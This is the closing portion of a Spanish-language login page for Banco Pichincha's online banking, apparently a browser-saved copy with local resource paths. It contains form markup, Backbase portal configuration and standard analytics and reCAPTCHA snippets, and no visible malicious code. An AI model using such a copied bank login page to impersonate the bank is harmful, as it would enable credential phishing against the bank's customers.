      <button type="submit" data-ng-click="Submit" class="btn btn-primary w-100 btn-font-size" data-ng-class="" data-ng-disabled="" disabled="disabled">Ingresar</button>
    </div>
  </form>

  <div class="row">
    <div class="text-center">
      <a class="home-links" href="#" ng-click="$ctrl.openModalHelp()" i18n-key="login.label.problems">¿Tienes problemas para iniciar sesión?</a>
    </div>
  </div>

  <div class="d-flex w-100" style="margin: 16px 0">
    <hr class="divider-content" style="margin:auto">
    <label class="ty-text-description text-16" style="margin:0 8px"> O </label>
    <hr class="divider-content" style="margin:auto">
  </div>

  <div class="text-center w-100">
    <p class="ty-text-description text-16 paddingBottom5" i18n-key="login.question.noAccount">¿Eres nuevo en Banca web? </p>
    <button type="button" class="button-signUp w-100" i18n-key="login.question.getAccount" ng-click="$ctrl.openModalSignUp()">Regístrate ahora</button>
  </div>
</div>

<div class="container-terms-mobil hidden-md hidden-lg ng-scope">
  <a class="small-links" ng-click="$ctrl.openTerms = true">
    Términos de uso
  </a>
  <p class="ty-text-description">
    © 2021 Banco Pichincha. Todos los derechos reservados
  </p>
</div>

<ui-bb-modal is-open="$ctrl.openTerms" animation="true" size="'sm'" backdrop="'static'" class="ng-scope"></ui-bb-modal>

<ui-bb-modal is-open="state.openModalHelp" animation="true" size="'sm'" backdrop="'static'" class="ng-scope"></ui-bb-modal>

<ui-bb-modal is-open="state.openModalSignUp" animation="true" size="'sm'" backdrop="'static'" class="ng-scope"></ui-bb-modal>
</div>
</div>
</div></div></div></div><div class="bp-widget-foot"></div></div></div></section></div></div></div><!-- Genesys initialization --><script src="Banco-Pichincha_files/widgets_init.js" type="text/javascript"></script><script>var widgetUserData; window.gadgets.pubsub.subscribe("genesys.config.loaded", function(data) {widgetUserData = data; var pathFile = "\/portalserver/static/features/%5BBBHOST%5D/vendor-bpi-genesys/scripts/"; init_genesys(pathFile); init_load(pathFile, widgetUserData); var cadenaGenesys = _genesys.widgets.channelselector.channels; _genesys.widgets.sidebar.showOnStartup = true;});</script><script type="text/backbase-xml"><?xml version="1.0" encoding="UTF-8"?><page><type>page</type><name>page_1597874995642</name><contextItemName>pichincha</contextItemName><parentItemName>pichincha</parentItemName><extendedItemName>page_1597874673124</extendedItemName><securityProfile>CONSUMER</securityProfile><tags/><uuid>f05a430d-05e6-4a70-ae2b-4f235bdd733b</uuid><lockState>UNLOCKED</lockState><properties><property name="Description" readonly="true" itemName="page-bpi-base"><value type="String"/></property><property name="TemplateName" readonly="true" itemName="page_1597874995642"><value type="string">bpiTemplate</value></property><property name="behaviors" readonly="true" itemName="page_1597874995642"><value type="string">be.perspective.Manager be.portalClientExt.PortalManagerPreferencesForm</value></property><property name="bundleName" readonly="true" itemName="page_1597874995642"><value type="string">dashboard</value></property><property label="Client Template" name="client-template" readonly="true" itemName="page_1597874995642"><value type="string">page</value></property><property name="cxpLocale" manageable="true"><value type="string">en-US</value></property><property name="enableSEO" readonly="true" itemName="page_1597874673124"><value type="string">false</value></property><property name="inlinePlaceholders" readonly="true" itemName="page-bpi-base"><value type="boolean">false</value></property><property label="Login Master" name="loginMaster" readonly="true" itemName="page_1597874673124" viewHint="designModeOnly,admin,checkbox"><value type="string">true</value></property><property name="order" readonly="true" itemName="page_1597874995642"><value type="double">25.0</value></property><property label="Theme name" name="themeName" readonly="true" itemName="page_1597874673124" viewHint="designModeOnly,manager"><value type="string">theme-bpi-retail</value></property><property name="title" readonly="true" itemName="page_1597874995642"><value type="string">Login Banca Web</value></property><property label="Version" name="version" readonly="true" itemName="page-bpi-base"><value type="string">1.0.1</value></property></properties><children><container><name>container_0a39e4f9-5ceb-4d6b-ad76-4a646e28e88a</name><contextItemName>pichincha</contextItemName><parentItemName>page_1597874995642</parentItemName><extendedItemName>Manageable_Area_Closure-7033028</extendedItemName><securityProfile>CONSUMER</securityProfile><tags><tag blacklist="false" type="regular">fluid</tag><tag blacklist="false" type="regular">manageable area</tag><tag blacklist="false" type="section">layouts</tag></tags><uuid>0947eae6-4ac4-4039-b492-87fcbef19f45</uuid><lockState>UNLOCKED</lockState><properties><property label="Description" name="Description" readonly="true" itemName="Manageable_Area_Closure"><value type="string">Area that will be manageable on regular pages. Items can be reordered, added and deleted.</value></property><property name="TemplateName" readonly="true" itemName="Manageable_Area_Closure"><value type="string">ManageableArea</value></property><property name="area" readonly="true" itemName="Manageable_Area_Closure-7033028"><value type="string">0</value></property><property name="autoExtend" readonly="true" itemName="Manageable_Area_Closure"><value type="boolean">true</value></property><property name="config" readonly="true" itemName="Manageable_Area_Closure"><value type="string">$(contextRoot)/static/backbase.com.2013.aurora/containers/ManageableArea/config.xml</value></property><property name="isManageableArea" readonly="true" itemName="Manageable_Area_Closure"><value type="boolean">true</value></property><property name="order" readonly="true" itemName="Manageable_Area_Closure-7033028"><value type="double">0.0</value></property><property name="thumbnailUrl" readonly="true" itemName="Manageable_Area_Closure"><value type="string">$(contextRoot)/static/backbase.com.2013.aurora/containers/ManageableArea/media/ManageableArea-icon.png</value></property><property name="title" readonly="true" itemName="Manageable_Area_Closure"><value type="string">Manageable Area</value></property><property name="viewNamespace" readonly="true" itemName="Manageable_Area_Closure"><value type="string">http://backbase.com/2013/aurora</value></property></properties><children><widget><name>widget-bpi-login-ng-6021124</name><contextItemName>pichincha</contextItemName><parentItemName>container_0a39e4f9-5ceb-4d6b-ad76-4a646e28e88a</parentItemName><extendedItemName>widget-bpi-login-ng</extendedItemName><securityProfile>CONSUMER</securityProfile><tags/><uuid>de1a4d21-2ca4-427c-a1cc-09003b611089</uuid><lockState>UNLOCKED</lockState><properties><property name="Description" readonly="true" itemName="widget-bpi-login-ng"><value type="String"/></property><property name="TemplateName" readonly="true" itemName="widget-bpi-login-ng"><value type="string">Standard_Widget</value></property><property name="area" readonly="true" itemName="widget-bpi-login-ng-6021124"><value type="string">0</value></property><property name="extension" readonly="true" itemName="widget-bpi-login-ng" viewHint="text-input,admin"><value type="string">ext-bpi-login-ng</value></property><property label="Feature Config Bb Module Loader" name="feature.config-bb-module-loader" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">config-bb-module-loader</value></property><property label="Feature Ext Bpi Login Ng" name="feature.ext-bpi-login-ng" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">ext-bpi-login-ng</value></property><property label="Feature Lib Bb Event Bus Ng" name="feature.lib-bb-event-bus-ng" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">lib-bb-event-bus-ng</value></property><property label="Feature Lib Bb Extension Helpers Ng" name="feature.lib-bb-extension-helpers-ng" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">lib-bb-extension-helpers-ng</value></property><property label="Feature Lib Bb Start" name="feature.lib-bb-start" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">lib-bb-start</value></property><property label="Feature Lib Bb State Container Ng" name="feature.lib-bb-state-container-ng" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">lib-bb-state-container-ng</value></property><property label="Feature Lib Bb Widget Extension Ng" name="feature.lib-bb-widget-extension-ng" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">lib-bb-widget-extension-ng</value></property><property label="Feature Lib Bb Widget Ng" name="feature.lib-bb-widget-ng" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">lib-bb-widget-ng</value></property><property label="Feature Model Bpi Login Ng" name="feature.model-bpi-login-ng" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">model-bpi-login-ng</value></property><property label="Feature Model Bpi New Login Ng" name="feature.model-bpi-new-login-ng" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">model-bpi-new-login-ng</value></property><property label="Feature Vendor Bb Angular" name="feature.vendor-bb-angular" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">vendor-bb-angular</value></property><property label="Feature Vendor Bb Systemjs" name="feature.vendor-bb-systemjs" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">vendor-bb-systemjs</value></property><property label="Feature Vendor Bpi Encryption Util" name="feature.vendor-bpi-encryption-util" readonly="true" itemName="widget-bpi-login-ng" viewHint=""><value type="string">vendor-bpi-encryption-util</value></property><property name="order" readonly="true" itemName="widget-bpi-login-ng-6021124"><value type="double">0.0</value></property><property label="Path" name="path" readonly="true" itemName="widget-bpi-login-ng" viewHint="designModeOnly"><value type="string">$(contextRoot)/static/widgets/[BBHOST]/widget-bpi-login-ng/scripts/widget-bpi-login-ng.js</value></property><property name="src" readonly="true" itemName="widget-bpi-login-ng"><value type="string">$(contextRoot)/static/widgets/[BBHOST]/widget-bpi-login-ng/index.html</value></property><property name="thumbnailUrl" readonly="true" itemName="widget-bpi-login-ng"><value type="string">$(contextRoot)/static/widgets/[BBHOST]/widget-bpi-login-ng/assets/icon.png</value></property><property label="Title" name="title" readonly="true" itemName="widget-bpi-login-ng" viewHint="text-input,admin"><value type="string">Login</value></property><property label="Version" name="version" readonly="true" itemName="widget-bpi-login-ng" viewHint="text-input,admin,designModeOnly"><value type="string">0.1.0-alpha.0</value></property><property name="widgetChrome" readonly="true" itemName="widget-bpi-login-ng"><value type="string">$(contextRoot)/static/backbase.com.2012.aurora/html/chromes/widget_none.html</value></property></properties></widget></children></container></children></page></script><script type="text/javascript" src="Banco-Pichincha_files/UpxKE8B"></script><div class="undefined"></div><div class="betternet-wrapper"></div><div class="absolutePool"><div></div></div><div class="bp-drag-dragSymbol" style="position: absolute; display: none;"></div>
<script type="text/javascript" id="">!function(b,e,f,g,a,c,d){b.fbq||(a=b.fbq=function(){a.callMethod?a.callMethod.apply(a,arguments):a.queue.push(arguments)},b._fbq||(b._fbq=a),a.push=a,a.loaded=!0,a.version="2.0",a.queue=[],c=e.createElement(f),c.async=!0,c.src=g,d=e.getElementsByTagName(f)[0],d.parentNode.insertBefore(c,d))}(window,document,"script","https://connect.facebook.net/en_US/fbevents.js");fbq("init","459628187956828");fbq("track","PageView");</script>
<noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=459628187956828&amp;ev=PageView&amp;noscript=1"></noscript>
<div style="display: none; visibility: hidden;"><script>var ExpireDays=90;qstr=document.location.search;qstr=qstr.substring(1,qstr.length);function SetCookie(c,d,a){var f=new Date,b=new Date;if(null==a||0==a)a=1;b.setTime(f.getTime()+864E5*a);document.cookie=c+"\x3d"+escape(d)+"; expires\x3d"+b.toGMTString()+"; path\x3d/"}thevars=qstr.split("\x26");
for(i=0;i<thevars.length;i++)switch(cookiecase=thevars[i].split("\x3d"),cookiecase[0]){case "sfmc_sub":sfmc_sub=cookiecase[1];SetCookie("SubscriberID",sfmc_sub,ExpireDays);break;case "e":e=cookiecase[1];SetCookie("EmailAddr_",e,ExpireDays);break;case "j":j=cookiecase[1];SetCookie("JobID",j,ExpireDays);break;case "l":l=cookiecase[1];SetCookie("ListID",l,ExpireDays);break;case "jb":jb=cookiecase[1];SetCookie("BatchID",jb,ExpireDays);break;case "u":u=cookiecase[1];SetCookie("UrlID",u,ExpireDays);break;
case "mid":mid=cookiecase[1],SetCookie("MemberID",mid,ExpireDays)};</script></div><iframe style="display: none !important; width: 1px !important; height: 1px !important; opacity: 0 !important; pointer-events: none !important;" name="_hjRemoteVarsFrame" title="_hjRemoteVarsFrame" id="_hjRemoteVarsFrame" src="Banco-Pichincha_files/box-3333a05ac05419926bfc064e06a742b1.htm"></iframe><div><div class="grecaptcha-badge" data-style="bottomright" style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;"><div class="grecaptcha-logo"><iframe title="reCAPTCHA" src="Banco-Pichincha_files/anchor.htm" role="presentation" name="a-nd3f1yon11qe" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" width="256" height="60" frameborder="0"></iframe></div><div class="grecaptcha-error"></div><textarea id="g-recaptcha-response-100000" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea></div><iframe style="display: none;"></iframe></div></body></html>
